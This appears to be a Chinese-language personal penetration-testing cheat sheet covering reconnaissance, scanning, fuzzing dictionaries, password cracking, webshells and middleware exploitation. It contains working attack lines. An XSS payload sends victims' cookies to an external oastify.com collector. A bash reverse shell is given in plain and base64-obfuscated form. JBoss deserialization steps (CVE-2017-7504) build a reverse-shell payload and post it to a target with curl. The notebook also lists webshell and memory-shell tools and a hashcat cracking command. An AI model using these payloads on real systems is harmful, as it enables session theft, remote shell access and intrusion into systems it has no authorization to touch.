渗透测试

记录一下渗透测试全流程，快速成为脚本小子。不定期更新。

信息收集 info collect

Web信息收集

E:\att_tools\info collect\webinfo_collect

网站查询

网络空间测绘

Shodan

FOFA

FofaViewer_1.1.11

子域名查询、DNS记录查询

subDomainBrute

python .\subDomainsBrute.py xx.com

特点是可以用小字典递归的发现三级域名、四级域名、甚至五级域名等不容易被探测到的域名。

OneForAll

https://github.com/shmilylty/OneForAll

python oneforall.py --target example.com run
python oneforall.py --targets ./example.txt run

是在域名系统等级中，属于更高一层域的域。比如，mail.example.com和calendar.example.com是example.com的两个子域，而example.com则是顶级域.com的子域。

ksubdomain

使用内置字典爆破
ksubdomain -d seebug.org
使用字典爆破域名
ksubdomain -d seebug.org -f subdomains.dict

Google查询

指定站点，然后-就是不包含这个，来查询

site:baidu.com -www

HTTP证书查询

一个SSL/TLS证书通常包含域名、子域名和邮件地址。查找某个域名所属证书的最简单的方法就是使用搜索引擎搜索一些公开的CT日志。

DNSGrep子域名查询&IP反查域名网站

Github信息收集

https://github.com/search

gitdorks_go

.\gitdorks_go.exe -gd .\medium_dorks.txt -nws 20 -target xxxxx -tf .\tf.txt -ew 3

token生成权限，勾选访问公共库

网站历史数据

获取到之前版本的网站

https://web.archive.org/

waybackurls

web指纹

TideFinger(linux)

python TideFinger.py -u http://www.123.com [-p 1] [-m 50] [-t 5] [-d 0]
    -u: 待检测目标URL地址
    -p: 指定该选项为1后，说明启用代理检测，请确保代理文件名为proxys_ips.txt,每行一条代理，格式如: 124.225.223.101:80
    -m: 指纹匹配的线程数，不指定时默认为50
    -t: 网站响应超时时间，默认为5秒
    -d: 是否启用目录匹配式指纹探测（会对目标站点发起大量请求），0为不启用，1为启用，默认为不启用。

Dismap

Dismap 定位是一个资产发现和识别工具，他可以快速识别 Web/tcp/udp 等协议和指纹信息，定位资产类型，适用于内外网，辅助红队人员快速定位潜在风险资产信息，辅助蓝队人员探测疑似脆弱资产

./dismap -i 192.168.1.1/24
./dismap -i 192.168.1.1/24 -o result.txt -j result.json
./dismap -i 192.168.1.1/24 --np --timeout 10
./dismap -u https://github.com/zhzyker/dismap

fingerprint指纹库

JS信息收集

油猴脚本 JSFinder

获取列表后测试下访问情况

# -*-coding: utf-8 -*-
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 
url_list = ['']

header = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36',
    }

count = 0
for url in url_list:
    count += 1
    try:
        res = requests.get(url, headers=header, verify=False, allow_redirects=True, timeout=10)
        code = res.status_code
        print(str(count) + '. ' + url + '   '+ '链接状态：' + str(code))
    except Exception as error:
        print(error)

目录扫描

御剑目录扫描

dirsearch

其他

网盘搜索

WEB批量请求 WebBatchRequest

HTTP参数扫描器 Arjun

arjun -u https://api.example.com/endpoint
arjun -u https://api.example.com/endpoint -m POST

详细参数

自动化采集

E:\att_tools\info collect\autoinfo_collect

AutoRecon（linux）

python autorecon.py xx.xx.xx.xx

SiteScan（py3）

python3 main.py -u http://www.xxx.com
python3 main.py -f url.txt
python3 main.py -u http://www.xxx.com -p http://127.0.0.1:8080

专注一站式解决渗透测试的信息收集任务。

功能：包括域名ip历史解析、nmap常见端口爆破、子域名信息收集、旁站信息收集、whois信息收集、网站架构分析、cms解析、备案号信息收集、CDN信息解析、是否存在waf检测、后台寻找以及生成检测结果html报告表等。

主机信息收集

**主机发现 **

E:\att_tools\info collect\host find

Angry IP Scanner

nbtscan

netspy是一款快速探测内网可达网段工具

nmap使用

主机详细信息收集

E:\att_tools\info collect\hostinfo_collect

Kscan

kscan.exe -t xx.xx.xx.xx/24				#端口扫描
kscan.exe --spy --scan 					#存活网段探测
kscan.exe -t xx.xx.xx.xx/24 --hydra		#暴力破解
kscan.exe -f 'cdn' --fofa-size 4 --scan #CDN检测、归属地识别

Kscan是一款纯go开发的全方位扫描器，具备端口扫描、协议检测、指纹识别，暴力破解等功能。支持协议1200+，协议指纹10000+，应用指纹20000+，暴力破解协议10余种

fscan

fscan.exe -h xx.xx.xx.xx/24  (默认使用全部模块)

一款内网综合扫描工具，方便一键自动化、全方位漏扫扫描。
支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。

wmic_info.bat

容器扫描 container scan

Trivy

veinmind

端口服务对应的漏洞利用

端口服务对应的漏洞利用

FUZZ

Web-Fuzzing-Box

https://github.com/gh0stkey/Web-Fuzzing-Box

├── Brute [爆破]
│   ├── Abroad [国外字典]
│   ├── Application [服务、应用字典]
│   ├── Basic_401_Login.txt [401认证字典]
│   ├── Chinese [适用于中国的字典]
│   ├── Password [密码字典]
│   ├── Ports [端口字典]
│   ├── Security_Product [安全产品]
│   ├── Subdomain [子域名]
│   ├── Top_Password [Top排名字典]
│   └── Username [用户名字典]

├── Dir [目录、文件名、接口]
│   ├── Others [其他字典]
│   ├── Burpsuite [适用于BurpSuite的字典，源于：https://gh0st.cn//archives/2020-02-13/1]
│   ├── Wooyun [乌云历史漏洞目录、文件字典]
│   └── Yujian [中国御剑字典]

├── Vuln [漏洞相关字典]
│   ├── Api_Bypass [Api漏洞：绕过403、鉴权绕过]
│   ├── File_Upload [文件上传漏洞]
│   ├── Logic [逻辑漏洞]
│   ├── File_Include [文件包含字典]
│   ├── Image_Dos [图片资源导致的DoS拒绝服务漏洞字典]
│   ├── Jsonp [JSONP跨域劫持漏洞字典]
│   ├── Open_Redirect [URL跳转漏洞字典]
│   ├── Sql_Injection [SQL注入字典]
│   ├── Traversal_Directory [遍历目录漏洞字典]
│   ├── Xml_Bomb [XML炸弹Payloads]
│   └── Xss [XSS字典与Payloads]

├── Other [其他字典]
│   └── 2W_Words_1.txt [2万常见英语单词]

└── Web [Web测试字典]
    ├── File_Path [一些文件及路径]
    ├── Funcation_Name.txt [函数名]
    ├── HTML [HTML相关]
    ├── Headers [HTTP头]
    ├── Http_Methods.txt [HTTP请求方式]
    ├── Integer_Overflows.txt [整数溢出]
    ├── Javascript_Filename.txt [JavaScript文件名]
    ├── Lcoalhost.txt [本地地址]
    ├── Parameters [请求参数]
    ├── URL [URL相关协议和类型]
    └── ViewState_Key.txt [用于ViewState反序列化]

字典生成

字典生成网站/

pydictor

SocialEngineeringDictionaryGenerator

爆破工具

超级弱口令检查工具V1.0

WebCrack管理后台爆破

hashcat-6.2.6

hashcat  -a 0  0192023a7bbd73250516f069df18b500  password.txt  --force #暴力破解MD5值

漏洞探测&利用

漏洞探测

E:\att_tools\vulnerability scan

goby

xary

xary使用文档

Acunetix

Artillery 插件化 JAVA漏洞扫描器https://github.com/Weik1/Artillery

资产灯塔系统

git clone https://github.com/TophantTechnology/ARL
cd ARL/docker/
docker volume create arl_db
docker-compose pull
docker-compose up -d # 默认端口5003 (https), 默认用户名密码admin/arlpass
git clone https://github.com/loecho-sec/ARL-Finger-ADD.git 	#添加指纹
python ARL-Finger-ADD.py https://192.168.47.158:5003/ admin arlpass 

POC编写

Vulmap 是一款 web 漏洞扫描和验证工具

python vulmap.py -u http://example.com

Web通用漏洞

SQL注入

MySQL注入

MySQL 漏洞利用与提权

E:\att_tools\web_tools\sql injection

文件包含&上传

文件包含漏洞

任意文件上传漏洞

XSS

XSS跨站脚本

XSS检测

<script>
fetch('https://6z68hsmpna8uv9gw4r2b1ht9a0gu4vsk.oastify.com',{
method:'POST',
mode:'no-cors',
body:document.cookie
});
</script>

CSRF跨站请求伪造

利用受害者尚未失效的身份认证信息（ cookie、会话等），诱骗其点击恶意链接或者访问包含攻击代码的页面，在受害人不知情的情况下以受害者的身份向（身份认证信息所对应的）服务器发送请求，从而完成非法操作
（如转账、改密等）。CSRF与XSS最大的区别就在于，CSRF并没有盗取cookie而是直接利用

1. 抓取一个正常请求的数据包，如果没有Referer字段和token，那么极有可能存在CSRF漏洞

2. 如果有Referer字段，但是去掉Referer字段后再重新提交，如果该提交还有效，那么基本上可以确定存在CSRF漏洞。

3. BurpPOC

利用

SSRF服务端请求伪造漏洞

让请求数据由远程的URL域名修改为请求本地、或者内网的IP地址及服务，来造成对内网系统的攻击。

注意点

分享，图片加载、下载，文章收藏等

绕过

1.限制特定域名

在对@解析域名中，不同的处理函数存在处理差异
http://www.aaa.com@www.bbb.com@www.ccc.com
在PHP的parse_url中会识别www.ccc.com，而libcurl则识别为www.bbb.com

2.ip不为内网

短地址
进制转换
指向127.0.0.1的域名

利用

gopher(py2)

mua

E:\att_tools\web_tools\mua

PHP木马研究

php_mua(存放大马，现在不流行了)

WebShell

webshell免杀生成

内存马

E:\att_tools\web_tools\mua\mem_shell

webshell管理工具

E:\att_tools\web_tools\WebShell

冰蝎，哥斯拉，蚁剑

中间件

Struts2

Spring Boot Actuators

ThinkPHP

E:\att_tools\vulnerability scan\Aazhen-RexHa

Weblogic

Jboss

CVE-2017-12149

检测1

检测2

利用

/bin/bash -i >& /dev/tcp/192.168.47.158/2333 0>&1
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNDcuMTU4LzIzMzMgMD4mMQ==

bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNDcuMTU4LzIzMzMgMD4mMQ==}|{base64,-d}|{bash,-i}

CVE-2017-7504

检测1

利用

https://github.com/joaomatosf/JavaDeserH2HC/

注意java版本：java version "1.8.0_20"

编译并生成序列化数据，生成ReverseShellCommonsCollectionsHashMap.class文件

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

序列化恶意数据至文件，生成ReverseShellCommonsCollectionsHashMap.ser文件

java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap 192.168.47.158:2333

--data-binary 以二进制的方式post数据到目标机器

curl http://192.168.47.152:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

Struts2

Webshere

反序列化漏洞

E:\att_tools\Deserialize_tools

有些工具是由于不同java版本开发，通过start.bat配置下临时环境变量

其他

越权

信息泄露

任意密码重置

提权

windows

linux

其他

常用命令生成

反弹shell一键生成网站

反弹shell本地生成

file:///E:/att_tools/%E5%8F%8D%E5%BC%B9shell/reverse-shell-generator/index.html

文件下载命令快捷生成器